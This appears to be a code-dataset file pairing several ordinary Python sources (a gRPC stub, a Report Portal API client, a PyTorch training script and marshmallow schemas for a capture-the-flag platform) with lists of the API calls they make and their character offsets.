        # unary_stream: returns an iterator of ServerEvent messages.
        return grpc.experimental.unary_stream(request, target, '/mruv.server.MruVServerService/ServerEventsStream',
            server_dot_server__pb2.ServerEventsStreamRequest.SerializeToString,
            server_dot_server__pb2.ServerEvent.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| [
"grpc.unary_stream_rpc_method_handler",
"grpc.method_handlers_generic_handler",
"grpc.unary_unary_rpc_method_handler",
"grpc.experimental.unary_stream",
"grpc.experimental.unary_unary"
] | [((5640, 5734), 'grpc.method_handlers_generic_handler', 'grpc.method_handlers_generic_handler', (['"""mruv.server.MruVServerService"""', 'rpc_method_handlers'], {}), "('mruv.server.MruVServerService',\n rpc_method_handlers)\n", (5676, 5734), False, 'import grpc\n'), ((3974, 4200), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.RegisterServer'], {'request_deserializer': 'server_dot_server__model__pb2.ServerInfo.FromString', 'response_serializer': 'server_dot_server__model__pb2.ServerID.SerializeToString'}), '(servicer.RegisterServer,\n request_deserializer=server_dot_server__model__pb2.ServerInfo.\n FromString, response_serializer=server_dot_server__model__pb2.ServerID.\n SerializeToString)\n', (4009, 4200), False, 'import grpc\n'), ((4299, 4554), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.GetRegisteredServers'], {'request_deserializer': 'server_dot_server__pb2.GetRegisteredServersRequest.FromString', 'response_serializer': 'server_dot_server__pb2.GetRegisteredServersResponse.SerializeToString'}), '(servicer.GetRegisteredServers,\n request_deserializer=server_dot_server__pb2.GetRegisteredServersRequest\n .FromString, response_serializer=server_dot_server__pb2.\n GetRegisteredServersResponse.SerializeToString)\n', (4334, 4554), False, 'import grpc\n'), ((4646, 4870), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.GetServerInfo'], {'request_deserializer': 'server_dot_server__model__pb2.ServerID.FromString', 'response_serializer': 'server_dot_server__model__pb2.ServerInfo.SerializeToString'}), '(servicer.GetServerInfo,\n request_deserializer=server_dot_server__model__pb2.ServerID.FromString,\n response_serializer=server_dot_server__model__pb2.ServerInfo.\n SerializeToString)\n', (4681, 4870), False, 'import grpc\n'), ((4968, 5217), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', 
(['servicer.UpdateServerStatus'], {'request_deserializer': 'server_dot_server__pb2.UpdateServerStatusRequest.FromString', 'response_serializer': 'server_dot_server__pb2.UpdateServerStatusResponse.SerializeToString'}), '(servicer.UpdateServerStatus,\n request_deserializer=server_dot_server__pb2.UpdateServerStatusRequest.\n FromString, response_serializer=server_dot_server__pb2.\n UpdateServerStatusResponse.SerializeToString)\n', (5003, 5217), False, 'import grpc\n'), ((5314, 5549), 'grpc.unary_stream_rpc_method_handler', 'grpc.unary_stream_rpc_method_handler', (['servicer.ServerEventsStream'], {'request_deserializer': 'server_dot_server__pb2.ServerEventsStreamRequest.FromString', 'response_serializer': 'server_dot_server__pb2.ServerEvent.SerializeToString'}), '(servicer.ServerEventsStream,\n request_deserializer=server_dot_server__pb2.ServerEventsStreamRequest.\n FromString, response_serializer=server_dot_server__pb2.ServerEvent.\n SerializeToString)\n', (5350, 5549), False, 'import grpc\n'), ((6311, 6643), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/mruv.server.MruVServerService/RegisterServer"""', 'server_dot_server__model__pb2.ServerInfo.SerializeToString', 'server_dot_server__model__pb2.ServerID.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/mruv.server.MruVServerService/RegisterServer',\n server_dot_server__model__pb2.ServerInfo.SerializeToString,\n server_dot_server__model__pb2.ServerID.FromString, options,\n channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (6340, 6643), False, 'import grpc\n'), ((7006, 7367), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/mruv.server.MruVServerService/GetRegisteredServers"""', 'server_dot_server__pb2.GetRegisteredServersRequest.SerializeToString', 
'server_dot_server__pb2.GetRegisteredServersResponse.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/mruv.server.MruVServerService/GetRegisteredServers',\n server_dot_server__pb2.GetRegisteredServersRequest.SerializeToString,\n server_dot_server__pb2.GetRegisteredServersResponse.FromString, options,\n channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (7035, 7367), False, 'import grpc\n'), ((7723, 8054), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/mruv.server.MruVServerService/GetServerInfo"""', 'server_dot_server__model__pb2.ServerID.SerializeToString', 'server_dot_server__model__pb2.ServerInfo.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/mruv.server.MruVServerService/GetServerInfo',\n server_dot_server__model__pb2.ServerID.SerializeToString,\n server_dot_server__model__pb2.ServerInfo.FromString, options,\n channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (7752, 8054), False, 'import grpc\n'), ((8415, 8770), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/mruv.server.MruVServerService/UpdateServerStatus"""', 'server_dot_server__pb2.UpdateServerStatusRequest.SerializeToString', 'server_dot_server__pb2.UpdateServerStatusResponse.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/mruv.server.MruVServerService/UpdateServerStatus',\n server_dot_server__pb2.UpdateServerStatusRequest.SerializeToString,\n server_dot_server__pb2.UpdateServerStatusResponse.FromString, options,\n channel_credentials, insecure, call_credentials, 
compression,\n wait_for_ready, timeout, metadata)\n", (8444, 8770), False, 'import grpc\n'), ((9131, 9472), 'grpc.experimental.unary_stream', 'grpc.experimental.unary_stream', (['request', 'target', '"""/mruv.server.MruVServerService/ServerEventsStream"""', 'server_dot_server__pb2.ServerEventsStreamRequest.SerializeToString', 'server_dot_server__pb2.ServerEvent.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/mruv.server.MruVServerService/ServerEventsStream',\n server_dot_server__pb2.ServerEventsStreamRequest.SerializeToString,\n server_dot_server__pb2.ServerEvent.FromString, options,\n channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (9161, 9472), False, 'import grpc\n')] |
# Copyright (c) 2018 <NAME> & Company, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
import json
import urllib.parse
from copy import deepcopy
from sast_controller.drivers.rp import URLS
class ReportPortalService:
    """
    Service that implements the Report Portal REST API.

    A single authenticated :class:`requests.Session` is kept open for the
    lifetime of the instance; call :meth:`close_session` when finished.
    """

    def __init__(self, host, token):
        """
        :param host:
            Report Portal host URL
        :param token:
            Report Portal API token
        """
        self._token = token
        headers = {
            'Accept': 'application/json',
            'Authorization': f'bearer {self._token}',
            'Content-type': 'application/json;charset=UTF-8'}
        self.report_portal_link = host
        self.ses = requests.Session()
        self.ses.headers.update(headers)
        # Deep copy so per-instance URL tweaks never mutate the shared
        # module-level URLS template mapping.
        self.urls = deepcopy(URLS)

    def close_session(self):
        """Close Report Portal session"""
        self.ses.close()

    def send_request(self, method, url, body=None, status_codes=None, verify=False):
        """
        Send request to Report Portal API
        :param method:
            HTTP method ("GET", "POST" or "PUT")
        :param url:
            request URL, joined onto the host passed to the constructor
        :param body:
            request body
        :param status_codes:
            list of acceptable status codes (defaults to [200])
        :param verify:
            set True to verify ssl certificate
            (NOTE: verification is disabled by default)
        :return:
            parsed JSON response body
        :raise AssertionError: when the API reports an invalid token
        :raise Exception: for an unsupported method or unexpected status code
        """
        if status_codes is None:
            status_codes = [200]
        url_ = urllib.parse.urljoin(self.report_portal_link, url)
        if method == "GET":
            response = self.ses.get(url_, verify=verify)
        elif method == "POST":
            response = self.ses.post(url_, body, verify=verify)
        elif method == "PUT":
            response = self.ses.put(url_, body, verify=verify)
        else:
            raise Exception(f"Unsupported request method {method}")
        if response.status_code in status_codes:
            return json.loads(response.text)
        # Report Portal signals auth failures inside the body rather than via a
        # dedicated status code, so inspect the text for the marker.
        if 'invalid_token' in response.text:
            raise AssertionError("Invalid Report Portal UUID token. Please verify RP_TOKEN param.")
        raise Exception(f"Wrong response.\n"
                        f"{method} {self.report_portal_link + url}\n"
                        f"Status code {response.status_code}\n "
                        f"{response.text}")

    def get_launch_info_by_number(self, project, scan_name, number):
        """
        GET /api/v1/{project}/launch?filter.eq.name={scan}&page.sort=number%2Cdesc&page.page={page}&page.size={size}
        :param project:
        :param scan_name:
        :param number:
            page number of the launch to fetch (page size is fixed to 1)
        :return:
            tuple of (launch ID, launch list response); a launch entry looks like::

                {
                    "owner": "", "share": , "id": "", "name": "", "number": 4,
                    "start_time": , "end_time": , "status": "",
                    "statistics": {
                        "executions": {"total": "", "passed": "", "failed": "", "skipped": "0"},
                        "defects": {}
                    },
                    "mode": "DEFAULT", "isProcessing": false,
                    "approximateDuration": , "hasRetries": false
                }
        :raise IndexError: when no launch with that name exists in the project
        """
        url = self.urls["get_launch_list_url"].format(
            project=project, scan=urllib.parse.quote_plus(scan_name),
            page=number, size=1)
        launch_list = self.send_request("GET", url)
        try:
            content = launch_list['content'][0]
        except IndexError:
            raise IndexError(
                'There is no {launch} inside {project} project.'
                '\nPlease double check Launch name and Project Name.'.format(
                    launch=scan_name, project=project))
        launch_id = content['id']
        return launch_id, launch_list

    def get_launch_info(self, project, launch_id):
        """
        GET /api/v1/{project}/item?filter.eq.launch={launch_id}&page.page={page}
        :param project:
        :param launch_id:
        :return:
            list with one response dict per page, each shaped like::

                {
                    "content": [],
                    "page": {"number": 1, "size": 20, "totalElements": 0, "totalPages": 0}
                }
        """
        info_list = []
        page = 1
        total_pages = 1
        # Walk every page; total_pages is refreshed from each response.
        while page <= total_pages:
            url = self.urls["get_launch_info_url"].format(project=project,
                                                          launch_id=launch_id,
                                                          page=page)
            req = self.send_request("GET", url)
            info_list.append(req)
            total_pages = int(req['page']['totalPages'])
            page += 1
        return info_list

    def compare_launches(self, project, current_launch, previous_launch):
        """
        GET /api/v1/{project}/launch/compare?ids={current_launch}&ids={previous_launch}
        :param project:
        :param current_launch:
        :param previous_launch:
        :return:
            comparison response::

                {
                    "result": [
                        {"values": {}, "name": "", "startTime": "", "number": "", "id": ""}
                    ]
                }
        """
        url = self.urls["compare_url"].format(project=project,
                                              current_launch=current_launch,
                                              previous_launch=previous_launch)
        return self.send_request("GET", url)

    def get_test_item_log(self, project, test_item):
        """
        GET /api/v1/{project}/log?filter.eq.item={test_item}&page.page={page}&page.size=100&page.sort=time%2CASC
        :param project:
        :param test_item:
        :return:
            flat list of log entries collected across all pages, each like::

                {"id": "", "time": , "message": "", "level": "", "test_item": ""}
        """
        content = []
        total_pages = 1
        page = 1
        # Accumulate log entries page by page until all pages are consumed.
        while page <= total_pages:
            url = self.urls["get_log"].format(project=project,
                                              test_item=test_item,
                                              page=page)
            response = self.send_request("GET", url)
            content += response["content"]
            total_pages = int(response['page']['totalPages'])
            page += 1
        return content

    def get_prj_info(self, prj):
        """
        GET /api/v1/project/{project}
        :param prj:
        :return:
            project configuration, e.g.::

                {
                    "addInfo": "string",
                    "configuration": {
                        "analyzer_mode": "ALL",
                        "emailConfiguration": {},
                        "entryType": "string",
                        "externalSystem": [],
                        "interruptedJob": "ONE_HOUR",
                        "isAutoAnalyzerEnabled": true,
                        "keepLogs": "TWO_WEEKS",
                        "keepScreenshots": "ONE_WEEK",
                        "projectSpecific": "string",
                        "statisticCalculationStrategy": "STEP_BASED",
                        "subTypes": {}
                    },
                    "creationDate": "2019-03-27T12:26:56.203Z",
                    "customer": "string",
                    "projectId": "string",
                    "users": [{"login": "string", "projectRole": "string", "proposedRole": "string"}]
                }

            404 responses are returned as-is (the body is still parsed) so
            callers can detect a missing project.
        """
        url = self.urls["get_project_info_url"].format(project=prj)
        return self.send_request("GET", url, status_codes=[200, 404])

    def get_external_system_info(self, project_):
        """
        Get external system config
        :raise IndexError: if no external system is configured in the project
        :return
            first configured external system, e.g.::

                {
                    "accessKey": "string", "domain": "string",
                    "fields": [
                        {
                            "definedValues": [{"valueId": "string", "valueName": "string"}],
                            "fieldName": "string", "fieldType": "string",
                            "id": "string", "required": true, "value": ["string"]
                        }
                    ],
                    "id": "string", "project": "string", "projectRef": "string",
                    "systemAuth": "string", "systemType": "string",
                    "url": "string", "username": "string"
                }
        """
        project_info = self.get_prj_info(project_)
        external_system = project_info["configuration"]["externalSystem"]
        if not external_system:
            raise IndexError("No available external system. Please create one.")
        return external_system[0]

    def create_project(self, project_name):
        """
        Create project if project does not exist
        POST /api/v1/project
        :param project_name:
        :return: API response on creation, or 'Project already exist'
        """
        project_info = self.get_prj_info(project_name)
        # The 404 body contains this hint when the project is unknown; use it
        # as the "does not exist yet" sentinel.
        if 'Did you use correct project name?' in str(project_info):
            url = '/api/v1/project'
            post_body = {
                "entryType": "INTERNAL",
                "projectName": project_name
            }
            return self.send_request("POST", url, json.dumps(post_body), status_codes=[201])
        return 'Project already exist'

    def update_ext_sys(self, prj, sys_id, params):
        """
        PUT /api/v1/{prj}/external-system/{sys_id}
        params:
            {"url":"","systemType":"JIRA","systemAuth":"BASIC","project":"",
            "fields":[{"fieldName":"Issue Type","id":"issuetype","fieldType":"issuetype","required":true,
            "value":[""],"definedValues":[]},
            {"fieldName":"Summary","id":"summary","fieldType":"string","required":true,"definedValues":[],
            "value":[""]},
            {"fieldName":"Assignee","id":"assignee","fieldType":"user","required":true,"definedValues":[],
            "value":["test"]}]}
        :return: API response
        """
        url = f'/api/v1/{prj}/external-system/{sys_id}'
        return self.send_request("PUT", url, json.dumps(params))

    def assign_users(self, prj, users):
        """
        PUT /api/v1/project/{prj}/assign
        params:
            {"userNames":{"user":"ADMIN"}}
        :return: API response
        """
        url = f'/api/v1/project/{prj}/assign'
        return self.send_request("PUT", url, json.dumps(users))

    def setup_external_sys(self, project, params):
        """
        POST /api/v1/{project}/external-system
        params:
            {
                "domain": "",
                "password": "<PASSWORD>",
                "project": "",
                "systemAuth": "Basic",
                "systemType": "JIRA",
                "url": "",
                "username": "userId"
            }
        :return: API response
        """
        url = f'/api/v1/{project}/external-system'
        return self.send_request("POST", url, json.dumps(params), status_codes=[201])

    def put_issue_status(self, project, body_params):
        """
        PUT /api/v1/{project}/item
        :param project:
        :param body_params:
            dict with 'issue_type' and 'test_item_id' keys
        :return: API response
        """
        url = self.urls["put_item_url"].format(project=project)
        # Serialize with json.dumps instead of raw %-interpolation so that any
        # special characters in the values are escaped correctly.
        put_body = json.dumps({
            "issues": [{
                "issue": {
                    "issue_type": body_params["issue_type"],
                    "autoAnalyzed": False,
                    "ignoreAnalyzer": False,
                },
                "test_item_id": body_params["test_item_id"],
            }]
        })
        return self.send_request("PUT", url, put_body)
| [
"json.loads",
"json.dumps",
"requests.Session",
"copy.deepcopy"
] | [((1252, 1270), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1268, 1270), False, 'import requests\n'), ((1332, 1346), 'copy.deepcopy', 'deepcopy', (['URLS'], {}), '(URLS)\n', (1340, 1346), False, 'from copy import deepcopy\n'), ((2521, 2546), 'json.loads', 'json.loads', (['response.text'], {}), '(response.text)\n', (2531, 2546), False, 'import json\n'), ((11390, 11408), 'json.dumps', 'json.dumps', (['params'], {}), '(params)\n', (11400, 11408), False, 'import json\n'), ((11699, 11716), 'json.dumps', 'json.dumps', (['users'], {}), '(users)\n', (11709, 11716), False, 'import json\n'), ((12194, 12212), 'json.dumps', 'json.dumps', (['params'], {}), '(params)\n', (12204, 12212), False, 'import json\n'), ((10543, 10564), 'json.dumps', 'json.dumps', (['post_body'], {}), '(post_body)\n', (10553, 10564), False, 'import json\n')] |
import logging
import time
from torch.utils.data import DataLoader
import torch.nn as nn
import torch.optim as optim
import torch.backends.cudnn as cudnn
import torch
import torch.nn.functional as functional
import numpy as np
from DTI import models, dataset, cli, utils, analyse
import os
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
def main():
    """Train and validate the model selected by the CLI args, then persist the
    final weights and an epoch-by-epoch metrics record to args.RECORD_PATH.

    Reads the module-level ``args``, ``LOG`` and ``device`` globals set up in
    the ``__main__`` guard.

    :raise ValueError: if ``args.MODEL`` names an unknown architecture.
    """
    utils.setup_seed(18)
    start_time = time.time()
    # Dataset loading
    train_set = dataset.CreateDataset(dataset.get_hcp_s1200(), usage='train')
    val_set = dataset.CreateDataset(dataset.get_hcp_s1200(), usage='val')
    train_loader = DataLoader(train_set, batch_size=args.batch_size, drop_last=False, shuffle=True, pin_memory=True,
                              num_workers=args.num_workers)
    val_loader = DataLoader(val_set, batch_size=args.batch_size, drop_last=True, shuffle=True, pin_memory=True,
                            num_workers=args.num_workers)
    # Model construction: 4 input channels only when all four feature maps are
    # fed in; otherwise the data is a single channel.
    if args.INPUT_FEATURES != '4' and args.INPUT_FEATURES != 'all':
        c = 1
    else:
        c = 4
    if args.MODEL == '1D-CNN':
        model = models.HARmodel(c, args.NUM_CLASSES).to(device)
    elif args.MODEL == 'CAM-CNN':
        model = models.CAM_CNN(c, args.NUM_CLASSES).to(device)
    else:
        # Fail fast with a clear message instead of crashing later on a None model.
        raise ValueError(f'Unsupported model: {args.MODEL}')
    if os.path.exists(args.LOAD_PATH):
        model.load_state_dict(torch.load(args.LOAD_PATH))
    optimizer = torch.optim.SGD(model.parameters(), lr=args.LR)
    # Per-epoch metric histories
    val_loss = []
    train_loss = []
    val_acc = []
    train_acc = []
    val_precision = []
    val_recall = []
    # Log the full configuration once up front for reproducibility.
    LOG.info("Args:{}".format(args))
    for epoch in range(args.epochs):
        train_results = train(train_loader, model, optimizer, epoch)
        val_results = validation(model, val_loader)
        # Record this epoch's metrics
        train_loss.append(train_results['train_loss'])
        train_acc.append(train_results['train_acc'])
        val_loss.append(val_results['val_loss'])
        val_acc.append(val_results['val_acc'])
        val_precision.append(val_results['val_precision'])
        val_recall.append(val_results['val_recall'])
    # Persist weights (timestamped) and the metrics record.
    torch.save(model.state_dict(), '.\\LOG\\{}.pkl'.format(time.strftime("%Y%m%d-%H%M%S", time.localtime())))
    # `with` guarantees the record file is closed even if a write fails.
    with open(args.RECORD_PATH, 'a+') as f:
        f.writelines('args' + str(args) + '\n')
        f.writelines('train_loss' + str(train_loss) + '\n')
        f.writelines('train_acc' + str(train_acc) + '\n')
        f.writelines('val_loss' + str(val_loss) + '\n')
        f.writelines('val_acc' + str(val_acc) + '\n')
        f.writelines('val_precision' + str(val_precision) + '\n')
        f.writelines('val_recall' + str(val_recall) + '\n')
    LOG.info("--- main.py finish in %s seconds ---" % (time.time() - start_time))
def train(dataloader, model, optimizer, epoch):
    """Run one training epoch.

    Reads the module-level ``args``, ``LOG`` and ``device`` globals.

    :param dataloader: training DataLoader yielding {'x': ..., 'y': ...} batches
    :param model: model to optimize (left in train mode)
    :param optimizer: optimizer stepping the model parameters
    :param epoch: epoch index, used only for logging
    :return: dict with 'train_loss' (summed batch losses) and 'train_acc'
    """
    model.train()
    train_loss = 0.0
    train_correct = 0
    start_time = time.time()
    # Hoisted out of the batch loop: the loss module is stateless per batch.
    criteria = nn.CrossEntropyLoss()
    for batch_index, batch_samples in enumerate(dataloader):
        # 1. move data to the target device
        x, y = batch_samples['x'].to(device), batch_samples['y'].to(device)
        if args.INPUT_FEATURES != '4' and args.INPUT_FEATURES != 'all':
            x = x.unsqueeze(1)  # add channel dim for single-feature input
        else:
            x = x.transpose(1, 2)  # (N, L, C) -> (N, C, L)
        # 2. forward
        output = model(x)
        loss = criteria(output, y.long())
        # 3. backward: clear old grads, backprop, and apply the update
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        # 4. metrics
        pred = output.argmax(dim=1, keepdim=True)
        train_correct += pred.eq(y.long().view_as(pred)).sum().item()
        # .item() detaches the scalar so autograd graphs are not retained
        # across the whole epoch (original accumulated live tensors).
        train_loss += loss.item()
        if batch_index % args.display_batch == 0:
            LOG.info("--- training progress rate {}/{} ---".format(batch_index, len(dataloader)))
    LOG.info("--- training epoch {} finish in {} seconds ---".format(epoch, (time.time() - start_time)))
    LOG.info('\tLoss:{}\tCorrect:{}/{}({})'
             .format(train_loss, train_correct, len(dataloader.dataset),
                     train_correct / len(dataloader.dataset)))
    return {
        'train_loss': round(train_loss, 4),
        'train_acc': round(train_correct / len(dataloader.dataset), 4)
    }
def validation(model, val_loader):
    """Evaluate the model on the validation set (no gradient tracking).

    Reads the module-level ``args``, ``LOG`` and ``device`` globals.

    :param model: model to evaluate (switched to eval mode)
    :param val_loader: validation DataLoader yielding {'x': ..., 'y': ...} batches
    :return: dict with 'val_loss', 'val_acc', 'val_precision', 'val_recall'
    """
    model.eval()
    test_loss = 0.0
    correct = 0
    start_time = time.time()
    # Hoisted out of the loop: the loss module is stateless per batch.
    criteria = nn.CrossEntropyLoss()
    with torch.no_grad():
        pred_list = []
        target_list = []
        for batch_index, batch_samples in enumerate(val_loader):
            # 1. move data to the target device
            x, y = batch_samples['x'].to('cuda'), batch_samples['y'].to('cuda')
            if args.INPUT_FEATURES != '4' and args.INPUT_FEATURES != 'all':
                x = x.unsqueeze(1)  # add channel dim for single-feature input
            else:
                x = x.transpose(2, 1)  # (N, L, C) -> (N, C, L)
            # 2. forward
            output = model(x)
            pred = output.argmax(dim=1, keepdim=True)
            # 3. metrics; .item() keeps a plain float instead of a tensor
            test_loss += criteria(output, y).item()
            correct += pred.eq(y.view_as(pred)).sum().item()
            y = y.cpu().numpy()
            pred_list = np.append(pred_list, pred.cpu().numpy())
            target_list = np.append(target_list, y)
    LOG.info("--- validation epoch finish in {} seconds --- Loss:{}\tCorrect:{}/{}({})"
             .format(time.time() - start_time, test_loss, correct, len(val_loader.dataset), correct / len(val_loader.dataset)))
    val_result = analyse.analyse_3class(target_list, pred_list)
    return {
        'val_loss': round(test_loss, 4),
        'val_acc': round(correct / len(val_loader.dataset), 4),
        'val_precision': val_result['precision'],
        'val_recall': val_result['recall'],
    }
if __name__ == '__main__':
    # Script entry point: configure logging and parse CLI args as module
    # globals (train/validation read `args` and `LOG` directly), then train.
    LOG = logging.getLogger('main')
    logging.basicConfig(level=logging.INFO)
    args = cli.create_parser().parse_args()
    main()
| [
"logging.getLogger",
"os.path.exists",
"logging.basicConfig",
"DTI.dataset.get_hcp_s1200",
"DTI.models.HARmodel",
"torch.nn.CrossEntropyLoss",
"DTI.utils.setup_seed",
"torch.load",
"numpy.append",
"torch.cuda.is_available",
"DTI.analyse.analyse_3class",
"DTI.cli.create_parser",
"torch.utils.... | [((381, 401), 'DTI.utils.setup_seed', 'utils.setup_seed', (['(18)'], {}), '(18)\n', (397, 401), False, 'from DTI import models, dataset, cli, utils, analyse\n'), ((419, 430), 'time.time', 'time.time', ([], {}), '()\n', (428, 430), False, 'import time\n'), ((615, 747), 'torch.utils.data.DataLoader', 'DataLoader', (['train_set'], {'batch_size': 'args.batch_size', 'drop_last': '(False)', 'shuffle': '(True)', 'pin_memory': '(True)', 'num_workers': 'args.num_workers'}), '(train_set, batch_size=args.batch_size, drop_last=False, shuffle=\n True, pin_memory=True, num_workers=args.num_workers)\n', (625, 747), False, 'from torch.utils.data import DataLoader\n'), ((790, 919), 'torch.utils.data.DataLoader', 'DataLoader', (['val_set'], {'batch_size': 'args.batch_size', 'drop_last': '(True)', 'shuffle': '(True)', 'pin_memory': '(True)', 'num_workers': 'args.num_workers'}), '(val_set, batch_size=args.batch_size, drop_last=True, shuffle=\n True, pin_memory=True, num_workers=args.num_workers)\n', (800, 919), False, 'from torch.utils.data import DataLoader\n'), ((1326, 1356), 'os.path.exists', 'os.path.exists', (['args.LOAD_PATH'], {}), '(args.LOAD_PATH)\n', (1340, 1356), False, 'import os\n'), ((2890, 2901), 'time.time', 'time.time', ([], {}), '()\n', (2899, 2901), False, 'import time\n'), ((4388, 4399), 'time.time', 'time.time', ([], {}), '()\n', (4397, 4399), False, 'import time\n'), ((5490, 5536), 'DTI.analyse.analyse_3class', 'analyse.analyse_3class', (['target_list', 'pred_list'], {}), '(target_list, pred_list)\n', (5512, 5536), False, 'from DTI import models, dataset, cli, utils, analyse\n'), ((5818, 5843), 'logging.getLogger', 'logging.getLogger', (['"""main"""'], {}), "('main')\n", (5835, 5843), False, 'import logging\n'), ((5848, 5887), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (5867, 5887), False, 'import logging\n'), ((325, 350), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], 
{}), '()\n', (348, 350), False, 'import torch\n'), ((482, 505), 'DTI.dataset.get_hcp_s1200', 'dataset.get_hcp_s1200', ([], {}), '()\n', (503, 505), False, 'from DTI import models, dataset, cli, utils, analyse\n'), ((558, 581), 'DTI.dataset.get_hcp_s1200', 'dataset.get_hcp_s1200', ([], {}), '()\n', (579, 581), False, 'from DTI import models, dataset, cli, utils, analyse\n'), ((3286, 3307), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (3305, 3307), True, 'import torch.nn as nn\n'), ((4409, 4424), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4422, 4424), False, 'import torch\n'), ((1388, 1414), 'torch.load', 'torch.load', (['args.LOAD_PATH'], {}), '(args.LOAD_PATH)\n', (1398, 1414), False, 'import torch\n'), ((4978, 4999), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (4997, 4999), True, 'import torch.nn as nn\n'), ((5230, 5255), 'numpy.append', 'np.append', (['target_list', 'y'], {}), '(target_list, y)\n', (5239, 5255), True, 'import numpy as np\n'), ((5899, 5918), 'DTI.cli.create_parser', 'cli.create_parser', ([], {}), '()\n', (5916, 5918), False, 'from DTI import models, dataset, cli, utils, analyse\n'), ((1142, 1178), 'DTI.models.HARmodel', 'models.HARmodel', (['c', 'args.NUM_CLASSES'], {}), '(c, args.NUM_CLASSES)\n', (1157, 1178), False, 'from DTI import models, dataset, cli, utils, analyse\n'), ((2255, 2271), 'time.localtime', 'time.localtime', ([], {}), '()\n', (2269, 2271), False, 'import time\n'), ((2737, 2748), 'time.time', 'time.time', ([], {}), '()\n', (2746, 2748), False, 'import time\n'), ((3931, 3942), 'time.time', 'time.time', ([], {}), '()\n', (3940, 3942), False, 'import time\n'), ((5366, 5377), 'time.time', 'time.time', ([], {}), '()\n', (5375, 5377), False, 'import time\n'), ((1240, 1275), 'DTI.models.CAM_CNN', 'models.CAM_CNN', (['c', 'args.NUM_CLASSES'], {}), '(c, args.NUM_CLASSES)\n', (1254, 1275), False, 'from DTI import models, dataset, cli, utils, analyse\n')] |
from marshmallow import fields, validate
from marshmallow_enum import EnumField
from bigeye.models.base import ma
from bigeye.models.user import UserRoles
from bigeye.models.challenge import ChallengeDifficulty
class ChallengeCategorySchema(ma.Schema):
id = fields.Integer(dump_only=True)
name = fields.String(required=True, validate=validate.Regexp('^[a-zA-Z0-9_]{3,40}$'))
total_challenges = fields.Integer(dump_only=True)
total_challenges_resolved = fields.Integer(dump_only=True)
class ChallengeSchema(ma.Schema):
id = fields.Integer(dump_only=True)
title = fields.String(required=True)
description = fields.String(required=False, missing=None)
difficulty = EnumField(ChallengeDifficulty, required=True)
flag = fields.String(load_only=True, required=True)
category = fields.Nested(ChallengeCategorySchema, dump_only=True)
points = fields.Integer(required=True)
created_at = fields.DateTime(dump_only=True)
resource_link = fields.String(dump_only=True)
link = fields.String(load_only=True, required=False, validate=validate.URL(relative=False))
hint = fields.String(required=False, missing=None)
is_resolved = fields.Boolean(dump_only=True)
class ChallengeResolveSchema(ma.Schema):
id = fields.Integer(dump_only=True)
user = fields.Nested(lambda: UserSchema(only=('id', 'email', 'username', 'role')), dump_only=True)
challenge = fields.Nested(ChallengeSchema, dump_only=True)
points = fields.Integer(dump_only=True)
resolved_at = fields.DateTime(dump_only=True)
class UserSchema(ma.Schema):
id = fields.Integer(dump_only=True)
created_at = fields.DateTime(dump_only=True)
email = fields.String(required=True, validate=validate.Email())
username = fields.String(required=True, validate=validate.Regexp('^[a-zA-Z0-9_]{3,20}$'))
role = EnumField(UserRoles, dump_only=True)
password = fields.String(load_only=True, validate=validate.Regexp('^(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9])(?=.*[!@#$%^&*_=+-]).{8,}$'))
token = fields.String(dump_only=True)
total_points = fields.Integer(dump_only=True)
total_points_solved = fields.Integer(dump_only=True)
challenges_resolved = fields.List(fields.Nested(ChallengeResolveSchema(exclude=('user',))), dump_only=True)
user_schema = UserSchema(only=('id', 'username', 'role', 'created_at'))
user_schema_own = UserSchema()
users_schema = UserSchema(many=True, only=('id', 'username', 'created_at', 'total_points_solved', 'challenges_resolved'))
challengecategory_schema = ChallengeCategorySchema(many=True)
challengecategorysingle_schema = ChallengeCategorySchema()
challenges_schema = ChallengeSchema(many=True, exclude=('category',))
challenge_schema = ChallengeSchema()
challengeresolve_schema = ChallengeResolveSchema()
| [
